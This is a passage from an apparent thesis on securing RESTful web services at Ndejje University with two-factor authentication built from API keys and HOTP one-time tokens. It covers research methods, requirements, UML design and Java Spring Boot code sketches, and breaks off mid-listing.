In Sections 2.1 to 2.3, the researcher aimed at gaining knowledge about the structure of RESTful web services, evaluating the current security implementations used in REST and understanding the vulnerabilities they face. By understanding the strengths and weaknesses of the existing security mechanisms in REST, the researcher was able to gather requirements for an improved security mechanism capable of outperforming the existing mechanisms. Additionally, by identifying and understanding the vulnerabilities facing RESTful web services, the researcher was able to establish the parameters to be considered in both the testing and validation processes. The researcher reviewed the SOAP security mechanisms and vulnerabilities with the aim of establishing a direct comparison between REST-Security and SOAP-Security. The comparison was intended to identify security implementations in SOAP that could be applied in REST in order to improve its reliability in terms of security. Finally, the researcher's intention was to develop an intermediary between the two different applications to facilitate communication between them. A RESTful API was preferred for this purpose, hence the reason why Section 2.7 covered API Management. From that section, the researcher was able to review existing literature regarding the API development lifecycle, that is, how APIs are designed, tested, implemented, and deployed. The API Management section also covered how APIs are analyzed and managed in a secure and scalable environment.

CHAPTER THREE

RESEARCH METHODOLOGY

3.1 Introduction

This Chapter presents the description of the research process. It provides information concerning the method that was used in undertaking this research as well as a justification for the use of the method. The Chapter also describes the various stages of the research, which include the data collection process, the process of data analysis, design and development. The Chapter ends with a discussion of the test and validation of the proposed tool and discusses the way in which the developed requirements are to be met in the current study.

3.2 Research design

This research is exploratory and applied in nature, as it attempted to explore the experiences of users of web applications as well as to provide a solution to the threats identified by the users. Therefore, for the purpose of this study, the research paradigm that was followed is qualitative in nature, using semi-structured interviews and brief questionnaires as well as observation.

Leedy (1993) explains that qualitative research is based on the belief that first-hand experience provides the most meaningful data. It is also believed that qualitative methods yield large volumes of rich data from a limited number of people. Qualitative research is aimed at understanding the world of participants from their frame of reference (Walker, 1985).

3.3 Area of study

Established in 1992, Ndejje University is the oldest private university in Uganda, owned by six Church of Uganda Dioceses in the Buganda Region. The University has two campuses, in Luwero and Kampala, offering and awarding qualifications in both undergraduate and graduate courses to over 5000 currently enrolled students. Ndejje University has two major information systems, ZeeVarsity and ARMS (Academic Records Management System). ARMS handles academic processes only, while ZeeVarsity, which is an integrated system, is expected to handle all University processes, including those handled by ARMS. Both systems are thought to be secure, as no security breach has been reported.

3.4 Sample and Sampling technique

The sample population was selected using purposive sampling, because this technique helps identify people who can provide specific information rather than picking respondents at random.

A sample of 8 ICT staff were interviewed on how the current systems at Ndejje University work. This was further backed up by 2 developers who work with ZeeVarsity and ARMS. Additionally, 10 system users, mainly comprising current Ndejje University students, were included in this study to further assess the user experience of the University's information systems. Class coordinators were preferred, as the researcher envisaged that their views represented the student groups they led.

3.5 Data collection methods and instruments

3.5.1 Interviews (Group discussions)

A group of 20 stakeholders including information communication technology experts, students and staff at Ndejje University were interviewed. The interviews followed a set of guide questions to determine how systems at Ndejje University are developed, implemented and operationalized. This was done in order to capture group opinions rather than individual opinions.

3.5.2 Document Review

Document review is a way of collecting data by reviewing existing documents. The study used document review method to collect information regarding web services, security and implementation of web applications. Articles from different journals were reviewed and requirements determined.

3.6 Data Analysis

Text transcribed from the interviews was analyzed using the qualitative content analysis approach. Content analysis is a research technique used to make replicable and valid inferences by interpreting and coding textual material (Bengtsson, 2016). Content analysis can be used on all types of written texts, no matter where the material comes from.

The researcher's intention for this study was to explore the experiences of the users of the University's web applications. By exploring the user experiences of the University's information systems, the researcher was able to clarify whether the users were in support of the integration of the University's autonomous information systems. Textual data transcribed from focus group interviews was presented in words and themes which made it possible to draw interpretation from the collected data. The researcher undertook a latent analysis by seeking an extended interpretive level of the underlying meaning of the transcribed text.

3.7 Design and implementation

3.7.1 Design

Web services are components that help integrate multiple systems running on different platforms. The design therefore relied heavily on message-based communication.

In designing the web service, the researcher used object-oriented design, employing the Unified Modeling Language (UML) to illustrate how the service would be implemented and shared across multiple platforms.

Sequence diagrams were used to show how the different objects would communicate, clearly showing which object would initiate the communication and when a given object would be active or destroyed.

Class diagrams were used to show the different classes and relationships between them. This further illustrated the different methods and variables that were required by the classes.

Activity diagrams were used in the study to illustrate the dynamic aspects of the service. They detailed the logical flow from one activity to another.

3.7.2 Development

The proposed REST security technique was developed using multiple languages and tools, including Java, PHP and C#. This helped to show how REST can be used for interoperability and integration of different applications irrespective of the underlying programming language. Apache, GlassFish and IIS were used as servers to test and run the different applications that were integrated using REST.

3.8 Quality Control Methods

The term quality control refers to the efforts and procedures that survey researchers put in place to ensure the quality and accuracy of data being collected using the methodologies chosen for a particular study (Lavrakas, 2008).

The researcher deployed a two-phase quality control mechanism to ensure that all the data collected and analyzed was accurate. Each phase is detailed as follows:

3.8.1 Development

This phase was further split into three sub-phases: protocol development, questionnaire control and pilot testing.

During protocol development, the researcher clearly defined what data was expected from the questionnaire and when it was to be collected. This informed the next sub-phase, questionnaire control.

The questionnaire control sub-phase mainly focused on developing a well-structured form with well-defined items to enable the respondents to provide correct and accurate answers. The last sub-phase of development was pilot testing of the questionnaire, at which stage the researcher determined whether what they wanted to collect was actually feasible to collect.

3.8.2 Data Collection

During this phase the researcher drafted an operations manual to give guidelines on how the collection of data was to be done, mainly to ensure that a standard way of collecting data was followed. After the data was collected, it was reviewed for completeness before analysis.

Data integrity and security controls were also implemented on the database to ensure that no one could alter the data and to keep track of who did what with the data.

Data entry constituted the second review of the data, after the one carried out during the data collection phase, and again ensured that the data being entered was correct and valid. This phase was followed by post-entry review and audits.

3.9 Test and Validation

3.9.1 Test

The developed REST service was tested using two types of testing techniques, namely unit testing and integration testing. Unit testing was used because it facilitates testing each individual unit of code (method). Furthermore, unit tests provide confidence during long-term development by establishing a dependable foundation.

Integration testing was used to determine if independently developed units of software work correctly when they are connected to each other. The main reason for using integration testing was to test whether many separately developed modules work together as expected. It was performed by activating many modules and running higher level tests against all of them to ensure they operated together.

3.9.2 Validation

Software validation is the process of evaluating a software product to ensure that it meets the pre-defined and specified business requirements as well as the end users' or customers' demands and expectations. Validation was done by involving information communication technology experts and developers to verify whether the developed REST security technique fulfils the set requirements and meets the user requirements. A validation guide was developed to direct the validators in checking the different functions.

3.10 Limitations of the study

Limited access to data and information regarding the current systems was a constraint. The study required an extensive review of the current systems and how they are implemented; however, access to this information was limited, possibly as a result of the sensitivity of the systems and the information they handle. The ZeeVarsity developers were particularly reluctant to share information.

The study was also limited by time, since the deadlines were fixed only a few days after classes, making it hard to work within the tight schedule to meet University deadlines. This impacted the research results; with more time, the researcher might have arrived at further interesting findings.

Literature on the implementation of security in REST is still limited. Most of the available work relating to RESTful web services focuses mainly on interoperability and data transfer.

CHAPTER FOUR

DESIGN, ANALYSIS AND DISCUSSION OF FINDINGS

4.0 Introduction

This chapter details the results and findings of the study. The data collected from the different sources was analyzed and summaries reported. Furthermore, the proposed security mechanism was designed and developed, and the process is documented in this section. The chapter concludes with a comparison of the proposed technique against some of the common existing security/authentication mechanisms in REST.

4.1 Demographic Information

The interviews carried out with the University staff, system users and developers were intended to find out how the stakeholders perceive the security and efficiency of the systems. They were also intended to find out how the developers implemented the different functions and components of the systems. The study comprised a sample of 20 system users, who included 8 University staff, 10 students and 2 developers (representing the ARMS and ZeeVarsity systems). The staff and students included both males and females, as illustrated in Figure 7, which shows that most of the respondents were male. This was attributed to the interests of the respondents: most people who were approached were not interested in the study due to their background or work schedule.

[Figure not included in this excerpt]

Figure 7: Demography based on Gender of Respondents

It was noted that the ratio of developers to users was 1:10, because most of the developers were not willing to provide information regarding the systems. This might have affected the results of the study in some way; however, the developers who did provide information regarding their systems were very helpful to the study.

4.2 System Usage and Efficiency

The users reported on the usage and efficiency of the systems. It was noted that the systems are able to execute the required functionalities, though not as efficiently as expected by the users. Users are frustrated by having different logins for every information system at the University, which requires them to keep multiple login details. Some users are required to manually fill data into a system, yet the same data could be extracted from the other University-owned systems; this was reported as a hectic and tedious activity. Therefore, users would like to have a system that can automatically fetch any data required from another system in order to limit errors and the time required to manually enter the data. Additionally, users prefer having a single login to the two major University information systems. The developers proposed that integrating the systems was possible, but that it required a secure and simple-to-implement service, since most of the data carried by the systems is very confidential. They further noted that if such a service were developed, it would improve the interoperability and scalability of the systems. One respondent proposed developing the service following the standard SOAP protocol; however, this was declined by the other developer, who proposed the REST style because it is simpler to implement, even though REST security has vulnerabilities, such as those of its underlying protocol, HTTP. Additionally, the systems have to be accessed by users via an expanding set of endpoints such as mobile devices, wearable devices, consumer and home electronic devices, automotive devices and environmental devices, among many others (Thomas and Gupta, 2016).

From the analysis of the data collected, the study focused on developing a secure RESTful web service, because it would be simple to implement in the organization and its security can be improved by modifying the current security mechanism.

4.3 Document Analysis

4.3.1 WS-Security for REST services

REST does not have predefined security methods, so developers define their own, and often they are in a hurry to deploy their web services, so they do not treat them with the same level of diligence as they treat web applications. These conditions lead to web services with serious vulnerabilities (Dunlu and Qingkui, 2009); for instance, most APIs handle authentication using a key but no secret, essentially requiring a user name but no password. Another problem is using HTTP Basic authentication (with no SSL) and letting the user name and password cross the wire with no encryption. REST APIs typically have the same attack vectors as standard web applications, including injection attacks, cross-site scripting (XSS), broken authentication and cross-site request forgery (CSRF) (Deepa and Thilagam, 2016).

4.3.2 Cipher Text Stealing

Ciphertext Stealing (CTS) is a method used in modes of operation to deal with messages whose length is not a multiple of the block size (e.g. 128 bits for AES). The benefit of CTS is that it prevents any expansion of the ciphertext, at the cost of a slight increase in complexity (El-Fotouh and Diepold, 2008).

4.3.3 HOTP: HMAC-Based One-Time Password Algorithm

HOTP is a one-time password (OTP) algorithm based on hash-based message authentication codes (HMAC) (VeriSign, 2005). The HOTP algorithm is based on an increasing counter value and a static symmetric key known only to the token and the validation service. To create the HOTP value, the HMAC-SHA-1 algorithm is used.
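In brief, and following the published HOTP specification (RFC 4226), the computation can be summarised as HOTP(K, C) = Truncate(HMAC-SHA-1(K, C)) mod 10^d, where K is the shared secret, C is the counter and d is the number of digits in the one-time password; a code sketch of this computation is given in Section 4.10.1.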

4.4 Existing Systems and Security mechanism

The existing systems use very simple authentication methods. Most of the applications use a text-based username and password combination to authenticate users into the system, and have implemented application-level roles to differentiate users. This kind of authentication mechanism is used in all Ndejje University applications and systems, each with a different implementation. However, web services can be used to communicate between the different university applications. Currently, authentication and authorization are only at web server level. Most of the applications use Digest Authentication and roles for authorization, as illustrated in Figure 8. It was also reported that the systems are autonomous and work independently, meaning that each system has its own server and the data from different systems cannot be integrated, and thus cannot support interoperability. Taking the case of Ndejje University, it currently runs ARMS, which is managed and hosted by the University, and the ZeeVarsity system, which is managed and hosted by its developers, Zee-node. These two systems manage student information, but the University was forced to replicate the data to feed both systems, causing a lot of redundancy.

Since the client-server architecture was followed in the development and deployment of the current systems, they face a number of security threats common to that architecture, including but not limited to eavesdropping and denial of service.

[Figure not included in this excerpt]

Figure 8: Client-Server Architecture - Digest Authentication

4.5 System and Security Requirements

System requirements are the configurations that a system must have in order for a hardware or software application to run smoothly and efficiently; failure to meet these requirements can result in installation or performance problems (Techopedia.com, 2019). The requirements were determined following the review of documents and the analysis of the responses from the developers and users. A number of requirements were identified and sub-divided into three main categories: functional, non-functional and implementation-specific requirements.

Functional requirements (“what the system should do”) are system requirements that describe what the system should be able to do, while non-functional requirements describe qualities such as the look and feel of the system and how well it performs its functions. Implementation-specific requirements (“the way the system does it”) capture a very important aspect of the system that is not covered by functional and non-functional requirements: how the functions are to be implemented or executed.

[Figure not included in this excerpt]

Figure 9: Types of Requirements (Perforce, 2014)

4.6 Functional Requirements

The RESTful web service for Ndejje University should be able to execute a number of tasks; however, only a few are listed below, since the main focus of the study is security and authentication.

4.6.1 Interoperability

The web service should facilitate interoperation of the different systems irrespective of the environment and programming languages, as specified by (Austin, et al., 2014). This is to enable integration of all University systems and to facilitate data sharing among the systems without changing the underlying applications.

4.6.2 Registrations and Adding of Users (Students, staff)

The systems at Ndejje are based on digest authentication; therefore, one needs to be registered on a system before having access to any of its functionality. The service is therefore required to allow user registration to the different systems through one central registration point.

4.6.3 System logs and tracking

The service should be able to log users and activities within the different services. This is to help track who executed a certain activity and when.

4.7 Non Functional Requirements

Correctness of the service was identified as the main non-functional requirement. This is the ability of the service to perform as expected, following the specifications.

The service is expected to have a high level of performance, meaning the system should have a fast response time as well as high throughput. Delays in processing requests are not acceptable to the users.

The service should have a high level of security, meaning it should be able to protect against any threats that might attack the service, as well as the University's systems and data.

The service should also be scalable. Since the University expects to purchase more systems and recruit more students and staff, the service is expected to be able to handle the growing demands of the University.

4.8 Implementation Specific Requirements

Implementation-specific requirements (ISR) of the service were described, but for the purposes of this report the study focused only on the ISR for the security and authentication mechanism of the service. The security specifics of REST were identified with respect to the authentication of applications.

[Table not included in this excerpt]

Table 1: ISR for REST Security

4.9 Design

4.9.1 Architectural Diagram

[Figure not included in this excerpt]

Figure 10: RESTful Web Service Architecture

The RESTful design has three discrete sections: the domain model, a series of REST endpoints, and a means of storing domain objects (persistence). This is also known as the three-tier architecture. The REST service was built on top of an n-tier architecture, which is why it inherits the three levels (Fowler, 2015). The three tiers in this architecture are (1) presentation, (2) domain, and (3) data source (used interchangeably with persistence layer). In our case, the REST endpoints map to the presentation layer, the domain model maps to the domain layer, and the in-memory database maps to the data source layer. Domain objects are not sent directly to the user. Instead, they are wrapped in resources and the resources are provided to the user. This provides a level of indirection between the domain object and how we present the domain object to the user. For example, if we wish to present the user with a different name for a field in our domain model (say getName instead of simply name), we can do so using a resource. Although this level of indirection is very useful in decoupling the presentation from the domain model, it does allow duplication to sneak in. In most cases, the resource will resemble the interface of the domain object, with a few minor additions. This issue was addressed later when the presentation layer was implemented.

4.9.2 Sequence Diagram

The designed authentication mechanism is modelled on the well-known two-factor authentication used in web applications (Brandom, 2017).

[Figure not included in this excerpt]

Figure 11: Sequence Diagram for Two- Factor Authentication Using HOTP in REST

Two-factor authentication is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism: knowledge (something only the user knows), possession (something only the user has), and inherence (something only the user is) (Rosenblatt, 2019; Petrus, 2019). In this study, the authentication has been automated and placed in REST. Since the two systems have to communicate without any human interference, this research provides a mechanism to secure REST services by validating a request two times. The first check is the API key (something only the client knows), which acts as the password. This API key is generated and uniquely assigned to a given client. When a request is made to the service, in other words when a URI is sent to a given endpoint of the service, it should come along with an API key that uniquely identifies the client requesting a given resource. The key is validated based on the decryption mechanism. If it is found to be authentic, the client is then requested to provide another piece of information, referred to in this study as the access token. The access token is a one-time unique code generated by the service server based on the HOTP algorithm. If the client is able to produce the access token, then the requested resource is made available.

Figure 11 shows a sequence diagram illustrating how six different objects communicate by sending messages to achieve two-factor authentication in REST services.

The user object initiates the process, because the systems at Ndejje University only request data when a user has requested it from the client interfaces. The user sends a request for data to the client application, which then passes this request on to its server application. However, the server has to first authenticate, or validate, that the request is coming from an authentic user. When the user request is validated, the server initiates communication with the service. This communication takes the form of the three-way handshake used in TCP (Conrad, Misenar and Feldman, 2016), where one device initiates the communication with a SYN message and the other responds with a SYN-ACK message; after the first acknowledgement of the SYN-ACK message, the communication of data starts. In this study, Server 1, also referred to as the client because it consumes the service, starts the communication by sending the request. When a request is received by the resource server (the REST service server), the server verifies the API key; if the key is authentic, the server responds with an acknowledgement, attaching the access token to the header/meta section. The client is expected to read off the access token and send it back to the resource server. The resource server validates the access token against the tokens generated prior to the received token. If the token is valid, the resource server requests the resource from the other system, herein referred to as Server 2. The generation and authentication of the access token is based on the HOTP algorithm, as described in Figure 12.
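A minimal server-side sketch of this exchange is given below. It assumes the hypothetical HotpGenerator and HotpValidator helpers sketched later in Section 4.10; the class name, header name and status codes are illustrative assumptions rather than the exact implementation.

import java.util.Set;
import org.springframework.http.ResponseEntity;

public class TwoFactorGate {

    private final byte[] sharedSecret;
    private final Set<String> registeredApiKeys;
    private long counter;

    public TwoFactorGate(byte[] sharedSecret, Set<String> registeredApiKeys) {
        this.sharedSecret = sharedSecret;
        this.registeredApiKeys = registeredApiKeys;
    }

    // Mirrors the exchange in Figure 11: check the API key, then challenge with
    // and finally validate an HOTP-based access token before serving the resource.
    public ResponseEntity<String> handle(String apiKey, String accessToken) throws Exception {
        if (apiKey == null || !registeredApiKeys.contains(apiKey)) {
            return ResponseEntity.status(401).body("invalid API key");            // first factor fails
        }
        if (accessToken == null) {
            String token = HotpGenerator.generate(sharedSecret, ++counter);       // issue challenge token
            return ResponseEntity.status(401).header("X-Access-Token", token).body("access token required");
        }
        if (!HotpValidator.validate(accessToken, sharedSecret, counter)) {
            return ResponseEntity.status(403).body("invalid access token");       // second factor fails
        }
        return ResponseEntity.ok("resource");   // in the real service, the resource is fetched from Server 2 here
    }
}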

[Figure not included in this excerpt]

Figure 12: Token Generator Sequence Diagram

Figure 12 illustrates how the HOTP access token is generated. The mechanism comprises five objects that exchange messages. The client requests an access token after sending a request with a valid API key, as explained and shown in Figure 11. To generate an access token, the request handler object verifies the received request and then forwards it to the token generator object. The token generator runs the HOTP algorithm and generates the access token, then verifies that the new token has never been generated before by checking the database through the persistence object. When the generated access token is valid and new, it is passed on from the token generator object to the token parser object, which then sends it to the client object. The client is expected to read off the access token from the meta message sent by the token parser.

4.9.3 Class diagram

[Figure not included in this excerpt]

Figure 13: Class Diagram for Token Generation

Figure 13 shows a class diagram. This was generated following the sequence diagrams that showed the objects; it should be noted that in object-oriented analysis, each object is, by definition, the result of a class (Barnes and Kölling, 2017). The class diagram shows four classes, which represent the four objects used in generating and passing the access token. The main parent class is the HOTP class. This class has the methods used to generate the access token, which include: a public generateHOTP method that returns a string after taking in a long parameter, a public calculateChecksum method that also returns a string, and the hmac_sha1 function that is responsible for masking the access token and returns a MAC object. The HOTPUtil class is used to validate the generated access token using the validate method, which takes in a string and returns a Boolean; it has a many-to-one cardinality with its parent class HOTP. The RequestHandler and HOTPParser classes inherit from the HOTP and HOTPUtil classes with a one-to-one cardinality.
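Read together with Figure 13, these classes can be outlined as the following Java skeleton; the method bodies are omitted and the signatures are assumptions inferred from the diagram description.

import javax.crypto.Mac;

// Skeleton of the classes described in Figure 13; bodies are omitted.
public class HOTP {
    public String generateHOTP(long counter) { /* builds the one-time password */ return null; }
    public String calculateChecksum(long number, int digits) { /* optional checksum digit */ return null; }
    protected Mac hmacSha1(byte[] key) throws Exception { /* keyed MAC used to mask the token */ return null; }
}

class HOTPUtil extends HOTP {
    public boolean validate(String token) { /* crosschecks the generated token */ return false; }
}

class RequestHandler extends HOTP { /* verifies incoming requests (one-to-one with HOTP) */ }

class HOTPParser extends HOTPUtil { /* passes the token back to the client (one-to-one with HOTPUtil) */ }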

4.9.4 State Diagram

[Figure not included in this excerpt]

Figure 14: State Diagram for Multi-Factor Authentication Mechanism

The REST service can be in four states, illustrated in Figure 14. The initial state, after the service starts, is Request Waiting; here the service is not processing anything but is instead waiting for any requests that might come in. When a request is received, the service moves from the Request Waiting state to the Authenticate state, where the request is checked for validity. If the request is not valid, the service goes back to the waiting state; if the request is valid, the service processes it in the Handle Request state. If the required resource is not available, the service goes back to the waiting state, or, if all requests have been processed, the resources are delivered and the service can go into Shutdown, where no more requests will be handled. It is also noted that, irrespective of the state, if the service runs into a bug it will automatically shut down.

4.10 Implementation

It was noted that Ndejje University has multiple systems and users. Each system executes a series of activities, even though at some point in time these systems will need to synchronize and share data. Therefore, as a proof of concept of the security mechanism, the study assumed two systems integrated using RESTful web services, with the data-sharing process secured.

This was developed using Java Spring Boot and JSON for exchanging data. This section details how the HMAC-HOTP can be integrated in REST services to enhance security by introducing a multi-factor authentication. As illustrated in Figure 11, the algorithm was added on top of the existing API key security mechanism thus creating a two-factor authentication in REST.

4.10.1 Implementation of HMAC-HOTP in REST

This algorithm relies on two factors: a shared secret and a moving factor (counter). As part of the algorithm, an HMAC-SHA-1 hash (hash-based message authentication code) of the moving factor is generated using the shared secret. The algorithm is event-based, meaning that whenever a new OTP is generated, the moving factor is incremented; hence the subsequently generated token is different each time.

Generating an HOTP Value

[Code listing not included in this excerpt]
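Since the listing is not reproduced in this excerpt, the following is a minimal, self-contained sketch of the computation described above: an HMAC-SHA-1 over the counter followed by the dynamic truncation defined in RFC 4226. The class name and digit length are assumptions.

import java.nio.ByteBuffer;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public final class HotpGenerator {

    private static final int DIGITS = 6;   // assumed length of the one-time password

    // Computes HOTP(secret, counter): HMAC-SHA-1 over the 8-byte counter, then dynamic truncation.
    public static String generate(byte[] secret, long counter) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(secret, "HmacSHA1"));
        byte[] hash = mac.doFinal(ByteBuffer.allocate(8).putLong(counter).array());

        int offset = hash[hash.length - 1] & 0x0F;                 // dynamic truncation offset
        int binary = ((hash[offset] & 0x7F) << 24)
                   | ((hash[offset + 1] & 0xFF) << 16)
                   | ((hash[offset + 2] & 0xFF) << 8)
                   |  (hash[offset + 3] & 0xFF);

        int otp = binary % (int) Math.pow(10, DIGITS);
        return String.format("%0" + DIGITS + "d", otp);            // left-pad with zeros
    }
}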

4.10.2 Hashed One Time Password

HOTP (Hashed One-Time Password) allows a new unique token to be created at each instance, based on a counter value and an initial seed. This means that at every URI request, a new hashed token is generated and passed on to the client, to be reproduced in the acknowledgement of a new request.

[Figure not included in this excerpt]

Figure 16: HOTP View

4.10.3 HOTP Validator

The generated token is based on the algorithm and it should be noted that at every generation, a new token is produced. The validator class (HOTPUtil) was used to crosscheck and confirm that the generated token is actually unique before it can be sent back to the client who initiated the request.

[Code listing not included in this excerpt]
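Because the validator listing is not included in this excerpt, the sketch below shows one plausible shape for such a validator: a token is accepted if it matches any value within a small look-ahead window of the server-side counter. The class name, window size and signature are assumptions, and the uniqueness check against the database described above is omitted.

public final class HotpValidator {

    private static final int LOOK_AHEAD = 5;   // assumed resynchronisation window

    // Accepts the token if it matches any counter value in [serverCounter, serverCounter + LOOK_AHEAD).
    public static boolean validate(String token, byte[] secret, long serverCounter) throws Exception {
        for (long c = serverCounter; c < serverCounter + LOOK_AHEAD; c++) {
            if (HotpGenerator.generate(secret, c).equals(token)) {
                return true;   // the caller should then advance its counter past c
            }
        }
        return false;
    }
}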

4.10.4 Token Sharing in REST

The access token generation was implemented using Java Standard Edition; therefore, the access token needs to be passed on via the network. This means encapsulating the access token in the HTTP header such that it can be received by the client, who will send it again alongside the request URI in addition to the API key. The token header below shows how the HTTP header is customized using a predefined custom function, which made it possible to append the access token and API key, handled by the TokenHandler authentication mechanism, as parameters accompanying the requested URI. The token is passed on as JSON; therefore, the service is expected to handle the JSON data type.

Abbildung in dieser Leseprobe nicht enthalten

HttpUriRequest request = RequestBuilder.get().setUri("https://arms.ndu.ac.ug?api_key=...&access_token=...").setHeader(HttpHeaders.CONTENT_TYPE, "application/json").build();
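A slightly fuller sketch of the same request construction, passing both factors as custom headers rather than query parameters, might look as follows; the endpoint path and header names are hypothetical.

import org.apache.http.HttpHeaders;
import org.apache.http.client.methods.HttpUriRequest;
import org.apache.http.client.methods.RequestBuilder;

public final class SecuredRequestFactory {

    // Builds a GET request that carries both authentication factors as custom headers.
    public static HttpUriRequest build(String apiKey, String accessToken) {
        return RequestBuilder.get()
                .setUri("https://arms.ndu.ac.ug/api/students")        // hypothetical endpoint
                .setHeader(HttpHeaders.CONTENT_TYPE, "application/json")
                .setHeader("X-API-Key", apiKey)                       // first factor
                .setHeader("X-Access-Token", accessToken)             // second factor (HOTP-based token)
                .build();
    }
}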

[Code listing not included in this excerpt]

The payload illustrates the kind of data that is passed on when sending the access token to the client. It is made up of four main fields: iss, exp, sub, and scope.

iss: who issued the token.

exp: when the token expires.

sub: the subject of the token; this is usually an application identifier.

scope: the endpoint from which data can be fetched.

TokenHandler

[Code listing not included in this excerpt]

This function is responsible for issuing the access token to the client. The token, which is generated by the Java class accsssTokenGen, is captured and signed with an HS256 key. At this point, the compact function adds the encoded token to the HTTP header illustrated in the “Token Header” code listing.
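The TokenHandler listing itself is not included in this excerpt. The sketch below uses the jjwt library, which matches the HS256 and compact terminology used here, to show how such a handler could assemble the iss/exp/sub/scope payload described above; the claim values, key handling and class structure are assumptions.

import java.util.Date;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;

public class TokenHandler {

    private final byte[] hs256Key;   // shared signing key (assumed to be provisioned elsewhere)

    public TokenHandler(byte[] hs256Key) {
        this.hs256Key = hs256Key;
    }

    // Wraps the generated HOTP value in a signed, compact token carrying the payload fields above.
    public String issueToken(String hotpValue, String clientId) {
        return Jwts.builder()
                .setIssuer("arms.ndu.ac.ug")                                     // iss
                .setSubject(clientId)                                            // sub
                .setExpiration(new Date(System.currentTimeMillis() + 60_000))    // exp: one minute (assumption)
                .claim("scope", "students")                                      // scope (hypothetical value)
                .claim("otp", hotpValue)
                .signWith(SignatureAlgorithm.HS256, hs256Key)
                .compact();                                                      // serialised token for the HTTP header
    }
}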

4.11 Testing

The service was tested on a local server and the following output was captured.

[Output not included in this excerpt]

The two-factor authentication that was developed was tested by running a request against the service. The output above shows that the request was received by the service and a token was generated and returned to the client, who later verified it by attaching the token to the URI, clearly showing how long the token remains valid. Therefore, if the client application did not respond with a new request attaching the token and API key, the request would be considered invalid. This meant that the mechanism was working and needed validation from experts. It should also be noted that the classes developed had a number of methods, which were tested using the JUnit testing framework. All methods executed as required, passing the JUnit assertions for the test cases used during the testing process.
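As an illustration of the kind of JUnit checks referred to here, the following tests exercise the hypothetical HotpGenerator and HotpValidator sketched earlier; they are examples rather than the actual test suite used in the study.

import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertTrue;

import org.junit.Test;

public class HotpGeneratorTest {

    private static final byte[] SECRET = "12345678901234567890".getBytes();

    @Test
    public void sameCounterProducesSameToken() throws Exception {
        // The algorithm is deterministic for a fixed secret and counter.
        assertEquals(HotpGenerator.generate(SECRET, 1L), HotpGenerator.generate(SECRET, 1L));
    }

    @Test
    public void tokenWithinLookAheadWindowIsAccepted() throws Exception {
        // A token generated a few counter steps ahead is still accepted by the validator.
        String token = HotpGenerator.generate(SECRET, 3L);
        assertTrue(HotpValidator.validate(token, SECRET, 1L));
    }
}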

The other testing carried out was penetration testing, which focused on ensuring that the implemented security mechanism cannot be broken. Penetration testing was considered because it would help ensure that data privacy is not compromised and that financial transactions and financial data over the University network remain secure. Additionally, it would help discover security vulnerabilities and loopholes in the APIs and underlying systems, and simulate, forecast, understand and assess the impacts of attacks and threats that might affect the service and the University systems, in order to make the APIs fully compliant with information security requirements.

The testing process was executed in three main phases. The first was scanning, which involved static code analysis with a main focus on taint analysis, where the variables (token and API key) were analyzed to ensure they cannot be modified by users during transmission. The second phase was gaining access, in which privilege escalation was used to uncover any injection or cross-site attacks that might affect the proper working of the service. The last phase was maintaining access and analysis, in which an illicit long-term presence on the network was simulated to assess the chances of gaining in-depth access to the APIs and the service. The analysis of the test was done and is presented in Table 2 below.

[Table not included in this excerpt]

Table 2: Penetration Testing Report

4.12 Validation of the Multi-Factor Authentication

The developed mechanism was tested and simulated using the Java Spring Boot framework to ensure that there were no bugs in the code. Validation, however, was done by external experts in the area of web services and APIs, following a validation guide. The results from the validation process are reported in Table 2. The variables considered during the validation included: the route, which relates to whether the resource being fetched is exactly the right resource to consume; the parameters, which concern whether the parameters supplied to consume a resource are valid (here there were at least two parameters to look out for); the pre-state, which represents whether the entity in question (the client) can be used; the post-status, which checks whether the session and session variables (entity) remain valid even after the session or action is performed; and the permission, which focuses on checking whether the client can really consume the service.

Route

Using one of the endpoints, the validators identified that the routes were always defined for all endpoints of the service, so it was easy to know which endpoint to consume by following the route. This is illustrated in the sample code for updating a student profile. Since the routes are set, the service is able to provide resources to clients.

Update Student Email Endpoint

[Code listing not included in this excerpt]
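Because the endpoint listing is not included in this excerpt, the following Spring Boot sketch illustrates the route, permission and parameter checks discussed in this section; the path, header names and validation logic are illustrative assumptions.

import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestHeader;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
@RequestMapping("/students")   // route: a hypothetical path for the "update student email" endpoint
public class StudentProfileController {

    @PutMapping("/{studentId}/email")
    public ResponseEntity<String> updateEmail(@PathVariable String studentId,
                                              @RequestParam("email") String email,
                                              @RequestHeader("X-API-Key") String apiKey,
                                              @RequestHeader("X-Access-Token") String accessToken) {
        // Permission: the two factors arrive as required headers; Spring rejects requests missing
        // them, and their values would be checked by the authentication layer (omitted here).
        // Parameters: a malformed email is rejected before any state change.
        if (email == null || !email.contains("@")) {
            return ResponseEntity.badRequest().body("invalid email");
        }
        // ... delegate to the service layer to persist the change ...
        return ResponseEntity.ok("email updated");
    }
}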

Permission

After certifying that the request targets the correct location, the next validation step was to check whether the client making the request is allowed to consume the endpoint. This was done by verifying that the authentication was working correctly and formed part of the endpoint. This was demonstrated in the studentprofile code, which carries an authentication annotation that inherits the API-key and access-token authentication mechanisms implemented in this study.

Figure not included in this excerpt
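
As the listing itself is not included here, the sketch below suggests one way such an authentication annotation could be wired in a Spring Boot 2 (javax.servlet) environment; the annotation name RequireApiKeyAndToken and the header names X-API-Key and Access-Token are assumptions made for illustration.

import java.lang.annotation.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.web.method.HandlerMethod;
import org.springframework.web.servlet.HandlerInterceptor;

// Hypothetical marker annotation: endpoints carrying it require both factors.
@Target(ElementType.METHOD)
@Retention(RetentionPolicy.RUNTIME)
@interface RequireApiKeyAndToken { }

class TwoFactorInterceptor implements HandlerInterceptor {

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response,
                             Object handler) {
        if (handler instanceof HandlerMethod
                && ((HandlerMethod) handler).hasMethodAnnotation(RequireApiKeyAndToken.class)) {
            String apiKey = request.getHeader("X-API-Key");          // first factor
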